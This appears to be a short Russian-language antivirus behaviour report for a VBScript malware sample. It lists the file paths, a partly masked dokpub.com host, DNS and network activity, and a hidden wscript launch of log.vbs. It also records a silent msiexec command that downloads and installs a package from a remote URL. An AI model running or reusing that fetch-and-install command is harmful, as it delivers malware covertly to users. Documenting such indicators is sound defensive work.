Техническая информация
- '<SYSTEM32>\wscript.exe' "%HOMEPATH%\Documents\log.vbs"
- %HOMEPATH%\documents\log.vbs
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\documents\log.vbs
- 'ge####e.dokpub.com':443
- DNS ASK ge####e.dokpub.com
- '<SYSTEM32>\wscript.exe' "%HOMEPATH%\Documents\log.vbs"' (со скрытым окном)
- '<SYSTEM32>\msiexec.exe' /i https://getfile.dokpub.com/yandex/get/https://yadi.sk/d/LGf8mWwWcNmoug /qn